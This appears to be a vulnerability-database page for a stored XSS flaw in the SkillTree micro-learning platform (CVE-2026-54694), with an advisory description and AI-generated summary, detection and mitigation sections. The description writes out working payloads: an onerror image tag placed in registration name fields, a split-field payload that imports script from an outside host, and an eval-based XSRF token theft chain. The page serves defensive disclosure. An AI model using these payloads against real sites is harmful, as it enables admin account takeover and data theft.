CVE-2026-54694
Deferred Deferred - Pending Action

Stored XSS in SkillTree Micro-Learning Platform

Vulnerability report for CVE-2026-54694, including description, CVSS score, EPSS score, affected products, exploitability, helpful resources, and attack-flow context.

Publication date: 2026-09-09

Last updated on: 2026-09-10

Assigner: GitHub, Inc.

Description

SkillTree is a micro-learning gamification platform. Prior to version 4.4.2, two independent code flaws combine into a single exploitable attack chain, with three distinct exploitation paths of escalating impact. `StringHighlighter.js` builds an HTML string by interpolating raw `value` substrings directly into a template literal with no HTML entity encoding. `HighlightedValue.vue` renders that string β€” and all unfiltered plain values β€” via Vue's `v-html` directive, which sets `innerHTML`. Separately, the account registration endpoint accepts `firstName`, `lastName`, and `nickname` fields and stores them without any HTML sanitization. An attacker self-registers with `firstName = "<img src=x onerror=alert(1)>"` (28 characters β€” within the 30-character field limit) and visits any quiz. The next time an administrator opens the Quiz Runs page the payload executes in their browser. Three attack paths exist with escalating impact. The first is basic cross-site scripting. Any self-contained payload fitting the 30-character limit (e.g. `<img src=x onerror=alert(1)>`, which is 28 chars) fires automatically when the admin navigates to the runs page through normal use. Arbitrary code execution in the admin's browser is confirmed with zero extra steps. The second is remote script loading via `import()`. Using the split-field technique (`lastName = "<img src=x"`, `firstName = "onerror=import('//nsas.cc/p')>"`), the attacker loads a full JavaScript file from their server. The file has no size limit and can perform any admin action β€” delete all projects, create backdoor accounts, dump user data, install a keylogger. No phishing required. The only constraint is that the URL must fit in 11 characters (`//nsas.cc/p`). The third is full cross-site request forgery token theft. Using `eval(name)`, the attacker pre-sets `window.name` to a data-theft payload by sending the admin one redirect link first. The session cookie is `HttpOnly` and cannot be read via `document.cookie`; however, the XSRF token is readable and the attacker leverages same-origin execution to call admin APIs from inside the victim's browser, relaying the responses to an external server. No admin interaction beyond routine use is required. Version 4.4.2 contains a patch.

CVSS Scores

EPSS Scores

Probability:
Percentile:

Meta Information

Published
2026-09-09
Last Modified
2026-09-10
Generated
2026-09-30
AI Q&A
2026-09-10
EPSS Evaluated
2026-09-29
NVD
EUVD

Affected Vendors & Products

Showing 2 associated CPEs
Vendor Product Version / Range
nationalsecurityagency skills-service to 4.4.2 (exc)
nationalsecurityagency skills-service 4.4.2

Helpful Resources

Exploitability

CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-116 The product prepares a structured message for communication with another component, but encoding or escaping of the data is either missing or done incorrectly. As a result, the intended structure of the message is not preserved.
CWE-79 The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.
CWE-20 The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly.
CWE-183 The product implements a protection mechanism that relies on a list of inputs (or properties of inputs) that are explicitly allowed by policy because the inputs are assumed to be safe, but the list is too permissive - that is, it allows an input that is unsafe, leading to resultant weaknesses.
CWE-693 The product does not use or incorrectly uses a protection mechanism that provides sufficient defense against directed attacks against the product.

Attack-Flow Graph

AI Quick Actions

Instant insights powered by AI
Executive Summary

CVE-2026-54694 is a stored cross-site scripting (XSS) vulnerability in the SkillTree micro-learning platform affecting versions 4.4.1 and earlier. It combines two flaws: StringHighlighter.js injects raw user input into HTML without encoding, and HighlightedValue.vue renders this input via Vue's v-html directive, executing any embedded scripts. Attackers exploit this by registering with malicious payloads in name fields, which execute when administrators view pages like Quiz Runs.

Detection Guidance

To detect this vulnerability, inspect the skills-service application for version 4.4.1 or earlier. Check if user registration fields (firstName, lastName, nickname) accept raw HTML input without sanitization. Review StringHighlighter.js and HighlightedValue.vue for improper encoding or v-html usage. Monitor admin pages like Quiz Runs for unexpected script execution.

Impact Analysis

This vulnerability allows attackers to execute arbitrary JavaScript in an administrator's browser with minimal prerequisites. Impact ranges from basic XSS (alert popups) to remote code execution (loading malicious scripts), theft of CSRF tokens, and full account compromise. Attackers can perform admin actions like deleting projects or stealing data without phishing.

Compliance Impact

This vulnerability likely violates GDPR and HIPAA by enabling unauthorized access to sensitive data through stored XSS. GDPR requires protection against unauthorized data processing, while HIPAA mandates safeguards for protected health information. The flaw's impact on data confidentiality and integrity could lead to compliance breaches.

Mitigation Strategies

Upgrade to version 4.4.2 or later immediately. Implement strict input validation and HTML sanitization for all user registration fields. Replace v-html with safe rendering methods. Apply output encoding in StringHighlighter.js. Review and restrict admin page access.

Chat Assistant

Ask questions about this CVE
Hi! I’m here to help you understand CVE-2026-54694. Ask me anything about the vulnerability, its impact, or mitigation strategies.
0/70

EPSS Chart